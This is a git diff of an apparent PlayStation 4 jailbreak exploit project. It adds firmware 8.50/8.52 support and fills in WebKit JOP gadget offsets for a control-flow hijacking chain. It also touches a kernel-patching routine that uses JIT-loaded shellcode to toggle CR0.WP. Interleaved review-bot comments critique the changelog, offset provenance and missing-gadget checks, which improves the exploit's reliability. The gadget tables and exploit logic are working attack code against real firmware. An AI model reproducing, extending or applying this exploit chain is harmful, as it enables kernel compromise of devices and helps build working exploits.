diff --git a/CHANGELOG.md b/CHANGELOG.md
index ac18a8f..f1b1784 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -15,6 +15,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 @janisslsm
 - Added loading payload from file
 - Added read8/read16/write8/write16 functions
+- Added 8.50 and 8.52 support
 ### Fixed
diff --git a/README.md b/README.md
index ec3776d..f4b3b30 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,7 @@ This table indicates firmware versions for which the *current version* of this r
 | | PSFree | Lapse |
 |:--------------|:----------|:-----------|
-| PlayStation 4 | 8.00-8.03 | 8.00-8.03 |
+| PlayStation 4 | 8.00-8.52 | 8.00-8.52 |
 | PlayStation 5 | N/A | N/A |
 *Note: Support for other firmwares listed in the "Vulnerability Scope" table may, or may not, be actively being worked on or may have been supported in previous versions of this repository. Please check `CHANGELOG.md` for historical support.*
diff --git a/src/lapse.mjs b/src/lapse.mjs
index 421f10f..75d6563 100644
--- a/src/lapse.mjs
+++ b/src/lapse.mjs
@@ -64,6 +64,8 @@ const [is_ps4, version] = (() => {
 throw RangeError(`invalid config.target: ${hex(value)}`);
 }
+ log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
+
 return [is_ps4, version];
 })();
@@ -1491,8 +1493,8 @@ async function get_binary(url) {
 }
 // Using JIT to load our own shellcode code here avoids the need to preform
-// some trick toggle the CR0 Protection Mode bit. We can just toggle it easily
-// within our shellcode.
+// some trick toggle the CR0.WP bit. We can just toggle it easily within our
+// shellcode.
 async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
 if (!is_ps4) {
 throw RangeError("ps5 kernel patching unsupported");
diff --git a/src/psfree.mjs b/src/psfree.mjs
index 84be2a1..8be9c30 100644
--- a/src/psfree.mjs
+++ b/src/psfree.mjs
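Review bot: The reworded comment above `patch_kernel` still carries the original wording errors — `preform` for `perform`, `some trick toggle` missing its `to`, and `shellcode code` — and since this hunk already rewrites that comment it is the natural place to fix them. I would make it `// Using JIT to load our own shellcode here avoids the need to perform some` / `// trick to toggle the CR0.WP bit. We can just toggle it easily within our` / `// shellcode.`. It would also help a reader if the comment said what the shellcode actually does with CR0.WP (presumably clears it for the kernel write and restores it before returning), but the body of `patch_kernel` continues past the end of the hunk, so that wording needs confirming against the rest of the function.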
@@ -60,6 +60,8 @@ const [is_ps4, version] = (() => {
 throw RangeError(`invalid config.target: ${hex(value)}`);
 }
+ log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
+
 return [is_ps4, version];
 })();
diff --git a/src/rop/ps4/800.mjs b/src/rop/ps4/800.mjs
index 42c95e9..2b46c0d 100644
--- a/src/rop/ps4/800.mjs
+++ b/src/rop/ps4/800.mjs
@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
 `;
 const jop4 = `
 push rdx
-mov edi, 0xac9784fe
 jmp qword ptr [rax]
 `;
 const jop5 = "pop rsp; ret";
@@ -112,7 +111,7 @@ const webkit_gadget_offsets = new Map(
 [jop1]: 0x0000000001988320, // `48 8b 7e 08 48 8b 07 ff 60 70`
 [jop2]: 0x000000000076b970, // `55 48 89 e5 48 8b 07 ff 50 30`
 [jop3]: 0x0000000000f62f95, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
- [jop4]: 0x00000000021af6ad, // `52 bf fe 84 97 ac ff 20`
+ [jop4]: 0x0000000001ef0d16, // `52 ff 20`
 [jop5]: 0x00000000000bf669, // `5c c3`
 }),
 );
diff --git a/src/rop/ps4/850.mjs b/src/rop/ps4/850.mjs
index e03617b..0606c2e 100644
--- a/src/rop/ps4/850.mjs
+++ b/src/rop/ps4/850.mjs
@@ -37,7 +37,7 @@ export let libkernel_base = null;
 // libSceLibcInternal.sprx
 export let libc_base = null;
-// TODO: gadgets for the JOP chain
+// gadgets for the JOP chain
 //
 // we'll use JSC::CustomGetterSetter.m_setter to redirect execution. its
 // type is PutPropertySlot::PutValueFunc
@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
 `;
 const jop4 = `
 push rdx
-mov edi, 0xac9784fe
 jmp qword ptr [rax]
 `;
 const jop5 = "pop rsp; ret";
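Review bot: The CHANGELOG entry in this commit records only 8.50/8.52 support, but the `800.mjs` hunk also changes the 8.00 `jop4` gadget offset (`0x00000000021af6ad` → `0x0000000001ef0d16`, bytes `52 ff 20`), which is an unannounced behaviour change for a firmware range the README already lists as supported. A wrong gadget offset turns a working 8.00-8.03 chain into a crash or a jump into arbitrary WebKit code, so this deserves its own changelog line and a one-line note next to `jop4` saying the shorter `push rdx; jmp [rax]` gadget was located and re-tested on the 8.00-8.03 WebKit build. If the shorter gadget was chosen because the old gadget's `mov edi, 0xac9784fe` side effect was unwanted, stating that reason in the comment would spare the next reader the same question; I cannot tell from the diff alone.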
@@ -109,11 +108,11 @@ const webkit_gadget_offsets = new Map(
 "mov dword ptr [rdi], eax; ret": 0x0000000000008e7f, // `89 07 c3`
 "mov dword ptr [rax], esi; ret": 0x0000000000cf6c22, // `89 30 c3`
- [jop1]: 0x0000000000000000, // ``
- [jop2]: 0x0000000000000000, // ``
- [jop3]: 0x0000000000000000, // ``
- [jop4]: 0x0000000000000000, // ``
- [jop5]: 0x0000000000000000, // ``
+ [jop1]: 0x00000000019881d0, // `48 8b 7e 08 48 8b 07 ff 60 70`
+ [jop2]: 0x00000000011c9df0, // `55 48 89 e5 48 8b 07 ff 50 30`
+ [jop3]: 0x000000000126c9c5, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
+ [jop4]: 0x00000000021f3a2e, // `52 ff 20`
+ [jop5]: 0x0000000000073c2b, // `5c c3`
 }),
 );
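Review bot: Nothing in the new `jop1`..`jop5` entries says which WebKit build the offsets were taken from, while the CHANGELOG and README in this commit claim both 8.50 and 8.52 and only `850.mjs` is touched. If 8.52 is meant to reuse this table, a comment at the top of the map such as `// offsets located in the 8.50 WebKit build; verified unchanged on 8.52` would record that assumption, and if it has not actually been verified on 8.52 the support claim is ahead of the code. Separately, the old placeholders show how easily an unfilled entry can slip through: wherever `webkit_gadget_offsets` is consumed, a lookup that yields `0` should throw (e.g. `if (!off) throw Error(\`missing gadget offset for ${name}\`);`) rather than be turned into a jump target at the module base; that consumer is outside this hunk, so such a guard may already exist.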